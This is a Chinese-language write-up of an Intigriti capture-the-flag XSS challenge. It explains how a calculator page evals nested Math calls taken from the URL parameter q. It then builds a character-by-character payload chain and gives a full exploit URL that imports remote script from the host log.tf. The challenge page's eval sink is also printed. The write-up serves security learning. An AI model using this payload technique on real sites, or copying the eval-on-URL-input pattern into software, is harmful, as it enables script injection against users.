题解
页面源码
<!DOCTYPE html><html lang="zh-Hant-TW"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pure Functional Math Calculator</title><style>body {background-color: #DFDBE5;background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%239C92AC' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");}main {max-width: 750px;margin: 64px auto;text-align: center;background: rgba(255,255,255,0.85);padding: 8px 16px;border-radius: 16px;}.container {display: flex;justify-content: center;}.stack-block {max-height: 500px;overflow: auto;box-sizing: border-box;width: 200px;min-height: 150px;border-width: 1px;border-style: solid;}.stack-block div {padding: 4px;background: aliceblue;border-bottom: 1px solid;word-break: break-word;}.wrapper{width: 400px;padding: 10px;border-width: 1px;border-style: solid;border-color: #DDDDDD;margin-right: 12px;}.result{box-sizing: border-box;width: 400px;padding: 12px;min-height: 150px;border-width: 1px;border-style: solid;border-color: #CCCCCC;text-align: right;font-family: sans-serif;font-size: 24px;color: #3c3c3c;word-break: break-word;}.row{display: flex;justify-content: space-between;}.row > button{width: 94px;height: 36px;display: inline-block;margin-top: 6px;border-width: 1px;border-style: solid;border-color: #CCCCCC;font-size: 16px;color: #3c3c3c;}.row > button:hover{cursor: pointer;border-color: #AAAAAA;}.btn-fn{background: #FFFFFF;}.btn-equal{background: #ff8d00;border-style: none;}.btn-equal:hover{background: #ea8200;}</style></head><body><main><h1>Pure Functional Math Calculator</h1><div class="container"><div class="wrapper"><div class="result"></div><div class="pad"><div class="row"><button class="btn-ac">AC</button></div><div class="row"><button class="btn-fn">sin</button><button class="btn-fn">cos</button><button class="btn-fn">tan</button><button class="btn-fn">floor</button></div><div class="row"><button class="btn-fn">acos</button><button class="btn-fn">asin</button><button class="btn-fn">atan</button><button class="btn-fn">ceil</button></div><div class="row"><button class="btn-fn">cosh</button><button class="btn-fn">sinh</button><button class="btn-fn">tanh</button><button class="btn-fn">round</button></div><div class="row"><button class="btn-share">share</button><button class="btn-equal">=</button></div></div></div><div class="stack-block"></div></div></main><script>(function(){name = 'Pure Functional Math Calculator'let nextMath.random = function () {if (!this.seeds) {this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465]next = this.seeds[new Date().getTime() % this.seeds.length]}next = next * 1103515245 + 12345return (next / 65536) % 32767}console.assert(Math.random() > 0)const result = document.querySelector('.result')const stack = document.querySelector('.stack-block')let operators = []document.querySelector('.pad').addEventListener('click', handleClick)let qs = new URLSearchParams(window.location.search)if (qs.get('q')) {const ops = qs.get('q').split(',')if (ops.length >= 100) {alert('Max length of array is 99, got:' + ops.length)return init()}for(let op of ops) {if (!op.startsWith('Math.')) {alert(`Operator should start with Math.: ${op}`)return init()}if (!/^[a-zA-Z0-9.]+$/.test(op)) {alert(`Invalid operator: ${op}`)return init()}}for(let op of ops) {addOperator(op)}calculateResult()} else {init()}function init() {addOperator('Math.random')}function addOperator(name) {result.innerText = `${name}(${result.innerText})`operators.push(name)let div = document.createElement('div')div.textContent = `${operators.length}. ${name}`stack.prepend(div)}function calculateResult() {result.innerText = eval(result.innerText)}function handleClick(e) {let className = e.target.classNamelet text = e.target.innerTextif (className === 'btn-fn') {addOperator(`Math.${text}`)} else if (className === 'btn-ac') {result.innerText = 'Math.random()';stack.innerHTML = '<div>1. Math.random</div>'operators = ['Math.random']} else if (className === 'btn-share'){alert('Please copy the URL!')location.search = '?q=' + operators.join(',')} else if (className === 'btn-equal') {calculateResult()}}})()</script></body></html>
解题思路
页面逻辑比较简单,主要思路是跟进到 URL参数 q 的限制逻辑
let qs = new URLSearchParams(window.location.search)if (qs.get('q')) {...}
限制共分三个:
经 , 拆分出来的数组长度最长为 100
所有拆分出来的字符串(即数组长度要以Math.作为开头
所有拆分出来的字符串只能以 a-zA-Z0-9. 字符组合而成
这里我们就可以得出q的传入格式:?q=Math.xxx,Math.xxx,Math.xxx
当满足了这三个限制,最先进入 addOperator 方法:
function addOperator(name) {result.innerText = `${name}(${result.innerText})`operators.push(name)let div = document.createElement('div')div.textContent = `${operators.length}. ${name}`stack.prepend(div)}
这里逻辑为将我们传入的Math.xxx以嵌套的方式 塞到result.innerText中
关于 result 的定义,在之前的代码中已经明确
const result = document.querySelector('.result')即document.querySelector('.result').innerText 中,也就是说:我们传入的q参数,最终将以下列方式进行输出
Math.xxx(Math.xxx(Math.xxx()))但此方法只进行的传值,并未有下一步操作,故接着跟进.
接着进入 calculateResult 方法:
function calculateResult() {result.innerText = eval(result.innerText)}
这里就比较简单粗暴了,明晃晃的eval仿佛在说:在这在这!(笑
这里用到了 result.innerText,即上一个方法中传递的 Math.xxx(Math.xxx(Math.xxx()))。到这里,执行形式已经明了:
所有q传入的Math.xxx,Math.xxx,Math.xxx都将以 这里我们就要开始解决第一个问题:如何执行我们想要的JS代码?
eval(`Math.xxx(Math.xxx(Math.xxx()))`)的格式进行执行。
如果直接使用某种方法,使 Math.xxx(Math.xxx(Math.xxx()))返回字符串是肯定执行不了的。只会返回相关的 String,效果约等同于 x=1;eval("x") 得到 1 一开始我想到的是直接使用构造方法constructor.constructor("xxxx"),但只能创建出一个匿名方法,并没有可以调用的地方,但随后我注意到了页面中重写的方法Math.random
Math.random = function () {if (!this.seeds) {this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465]next = this.seeds[new Date().getTime() % this.seeds.length]}next = next * 1103515245 + 12345return (next / 65536) % 32767}
这里可以看到使用this.seeds(this即为Math对象) 为Math中创建一个Arrayseeds
Array我就想到了可以通过Array.prototype.map()等一系列的方法,以seeds中的元素为参数,对其执行map中所包裹的方法
例如当seeds为[1,2,...]时,调用seeds.map(eval),就等同于执行了:
eval(1)
eval(2)
eval(...)
这时我们就找到了最关键的执行环境Math.seeds.map(Math.constructor.constructor())
这里关于Math.constructor.constructor就涉及到了构造方法相关知识Math的constructor是ObjectObject的constructor是Function
所以 Math.constructor.constructor() 等同于 Function()等同于function anonymous(){}
再组合上 Array.map 可以实现可控内容执行
搞定了执行环境,接下来就是熟悉的拼接字符串的环节,如何在只用一个括号的方式进行拼接字符串呢?我最开始想到的是 String.prototype.concat()方法,即通过
/*1*/String.prototype.concat(String.prototype.toString(/*2*/String.prototype.concat(...)))想象是美好的,例如我通过Math.exp.name得到了一个String值exp,以此作为最外层的参数。当我添加一层过后,第二次进行concat时指向的String不是最外层的concat后的值,因为concat只是拼接返回,而不是累加。同时Math.exp.name的值也是只读的,不可以修改。
虽然上述思路没有走通,但为我带来了一个新的想法:如果我有一个可控变量,并且我可以通过某种方式累加修改它,那么就有鸡喙!
一开始我是想通过某个不为人知的方法来对属性进行修改,但翻了两天MDN Web Docs除了发现Function.prototype.bind可以将某方法需要的多个参数分多次传递外,并无其他有价值的发现。走过这么多弯路后,回顾页面时我发现我要的可控变量Math.seeds不就明晃晃的在这里放着吗?!
再次回顾下Math.seeds的内容,它为Array数组,内部包含了五个Float,为:
[0.62536, 0.458483, 0.544523, 0.323421, 0.775465]如果直接将它清空,并塞入假设能够得到的任意字符串,最后将它toString放到匿名方法中。不就可以直接搞定吗?在花了一点点时间后,得到最初的思路:
清空数组
Math.seedsMath.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop()))))利用
Array.prototype.push,添加数字 4 与 1,因为push过后会默认返回数组的长度,且括号内步先于括号外执行,故得到Math.seeds为['4', 1]Math.seeds.push(Math.seeds.push(Math.cbrt.name.length.toLocaleString()))利用
Array.prototype.join(/*空*/)将Math.seeds转换为41,之后将String.fromCharCode(41)得到的结果),push到Math.seeds中Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.seeds.join(Math.seeds.constructor.constructor.prototype.name.toLocaleString())))最后擦屁股,把
'4'与1清除掉Math.seeds.shift(Math.seeds.shift())
这样,我们就成功得到了一个内容为[')']的Array。按照这样下去,如法炮制将import(xxxx)或eval('`'+location)塞入,但很快我又撞到了一堵墙——长度。
还记得吗?页面源码中有这么一句ops.length >= 100,也就是说:我们传递进来的值总个数不能大于100。那么在以上得到了一个括号的情况下,我们共使用了多少个呢?答案是:5+3+4+2=14
14个!就算抛开清空Math.seeds的五连pop,也要9个参数才能换取1个字符。另外执行环境的map与匿名方法也得要2个,我们最多只能塞进来(100-5-2)/9≈10共计10个字符!这还是我们在第2步投机取巧后才完成9个字符。很显然,在有长度限制的情况下,此路不通。
没办法,我又只能开始对着黑漆漆的窗口发呆。
看着sin、cos、tan按钮,我突然意识到刚刚的做法有多么愚蠢:我为什么要放着现成的可以通过Math对象可以直接得到数字的方法不用,而是傻乎乎又费劲巴力的拼接字符串的长度再换成数字?
中间省略掉对着Math对象的方法各种咔咔的传参(就是人肉fuzz),只为得到某个指定的数字例如41,最终得到:
Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))再结合
Math.seeds.push(Math.exp.name.constructor.fromCharCode())共计5位就得到了一个字符!也就是说,使用尽可能短的payload例如长度为17的import(/\xss.hk/) 17*5+5+2=92共计92位就可以实现!!!!也就是说这条路行得通!把payload转换为10进制
[105,109,112,111,114,116,40,47,92,120,115,115,46,104,107,47,41]
激动的心,颤抖的手,键盘库库一顿敲。中间死活得不到一百左右的准确数值时我发现:我为什么要傻乎乎的fromCharCode一个字母?我直接从别的方法name中截取不就成了?!在花了亿点点时间后,我得到了如下:
// import('//log.tf') 方法// 共计 82 个// 最后push需要反过来push// 执行Math.seeds.map(Math.constructor.constructor())// 格式化成字符串Math.seeds.join(Math.random.name.toString())// 清空列表Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop()))))// 字符 imMath.seeds.push(Math.exp.name.constructor.prototype.trim.name.slice(Math.constructor.is.name.length.toLocaleString()))// 字符 pMath.seeds.push(Math.seeds.constructor.prototype.pop.name.slice(Math.constructor.is.name.length.toLocaleString()))// 字符 orMath.seeds.push(Math.floor.name.slice(Math.exp.name.length.toLocaleString()))// 字符 tMath.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString()))// 字符 ( 40Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log2(Math.seeds.constructor.isPrototypeOf.name.length.toString()))))// 字符 ' 39Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 / 47Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 / 47Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 logMath.seeds.push(Math.log.name.toLocaleString())// 字符 . 46Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))// 字符 tMath.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString()))// 字符 fMath.seeds.push(Math.seeds.constructor.of.name.slice(Math.constructor.length.toLocaleString()))// 字符 ' 39Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))))))// 字符 )Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))))
再花一点点时间组装一下:
// 82位Math.seeds.map(Math.constructor.constructor(Math.seeds.join(Math.random.name.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.seeds.constructor.of.name.slice(Math.constructor.length.toLocaleString(Math.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.log.name.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log1p(Math.exp(Math.log1p(Math.exp(Math.log2(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.expm1(Math.log(Math.expm1(Math.log(Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.exp(Math.log2(Math.seeds.constructor.isPrototypeOf.name.length.toLocaleString(Math.seeds.push(Math.hypot.name.slice(Math.acos.name.length.toLocaleString(Math.seeds.push(Math.floor.name.slice(Math.exp.name.length.toLocaleString(Math.seeds.push(Math.seeds.constructor.prototype.pop.name.slice(Math.constructor.is.name.length.toLocaleString(Math.seeds.push(Math.exp.name.constructor.prototype.trim.name.slice(Math.constructor.is.name.length.toLocaleString(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop())))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
拼接成URL:
https://challenge-0823.intigriti.io/challenge/index.html?q=Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.constructor.is.name.length.toLocaleString,Math.exp.name.constructor.prototype.trim.name.slice,Math.seeds.push,Math.constructor.is.name.length.toLocaleString,Math.seeds.constructor.prototype.pop.name.slice,Math.seeds.push,Math.exp.name.length.toLocaleString,Math.floor.name.slice,Math.seeds.push,Math.acos.name.length.toLocaleString,Math.hypot.name.slice,Math.seeds.push,Math.seeds.constructor.isPrototypeOf.name.length.toLocaleString,Math.log2,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.log,Math.expm1,Math.log,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.log.name.toLocaleString,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.acos.name.length.toLocaleString,Math.hypot.name.slice,Math.seeds.push,Math.constructor.length.toLocaleString,Math.seeds.constructor.of.name.slice,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.log,Math.expm1,Math.log,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.random.name.toLocaleString,Math.seeds.join,Math.constructor.constructor,Math.seeds.map最后的最后~ 再次感谢intigriti与huli(@aszx87410)带来的题目!
另外每个月23号左右(23年为23),intigriti会联合各种大佬,再次推出新的XSS题目。如果有兴趣也可以关注一下它们再推特的推文。
文章来源: https://mp.weixin.qq.com/s?__biz=MzIxMDYyNTk3Nw==&mid=2247514544&idx=1&sn=f62a1cfacbe3659e48523daf825f0148&chksm=97634d66a014c470203637d93fef35ba1103a43a5782c61e79ffc9e61d33b3c2f6f8cdd6d591&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh